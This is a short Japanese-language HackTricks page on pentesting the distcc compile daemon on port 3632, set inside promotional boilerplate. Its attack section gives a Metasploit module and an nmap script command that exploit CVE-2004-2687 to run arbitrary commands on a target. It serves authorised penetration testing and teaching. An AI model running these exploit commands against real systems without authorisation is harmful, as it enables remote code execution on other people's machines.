hacktricks/network-services-pentesting/3632-pentesting-distcc.md

ゼロからヒーローまでAWSハッキングを学ぶ htARTE（HackTricks AWS Red Team Expert）！

HackTricks をサポートする他の方法:

• HackTricks で企業を宣伝したい または HackTricks をPDFでダウンロードしたい 場合は SUBSCRIPTION PLANS をチェックしてください！
• 公式PEASS＆HackTricksスワッグを入手する
• The PEASS Family、当社の独占的な NFTs コレクションを発見する
• **💬 Discordグループ または telegramグループ に参加するか、Twitter 🐦 @carlospolopm をフォローする。
• ハッキングトリックを共有するためにPRを HackTricks と HackTricks Cloud github リポジトリに提出する。

基本情報

Distcc は、ネットワーク内の他のコンピュータの アイドル処理能力 を利用して コンパイルプロセス を強化するツールです。distcc がマシンに設定されると、このマシンは コンパイルタスク を別のシステムに分散することができます。受信システムは distccdデーモン を実行しており、送信されたコードを処理するために 互換性のあるコンパイラ がインストールされている必要があります。

デフォルトポート: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

攻撃

CVE-2004-2687 に対して脆弱性があるかどうかをチェックして、任意のコードを実行できるかどうかを確認します：

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

このサービスを検出するとは思いません。

リソース

• https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
• https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

Álex B (@r1p) によって作成された投稿

ゼロからヒーローまでのAWSハッキングを学ぶ htARTE (HackTricks AWS Red Team Expert)!

HackTricks をサポートする他の方法:

• HackTricks で企業を宣伝したい または HackTricks をPDFでダウンロードしたい 場合は SUBSCRIPTION PLANS をチェックしてください！
• 公式PEASS＆HackTricksのグッズを入手する
• The PEASS Family を発見し、独占的な NFTs のコレクションを見つける
• 💬 Discordグループ または telegramグループ に参加するか、Twitter 🐦 @carlospolopm をフォローする。
• HackTricks と HackTricks Cloud のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。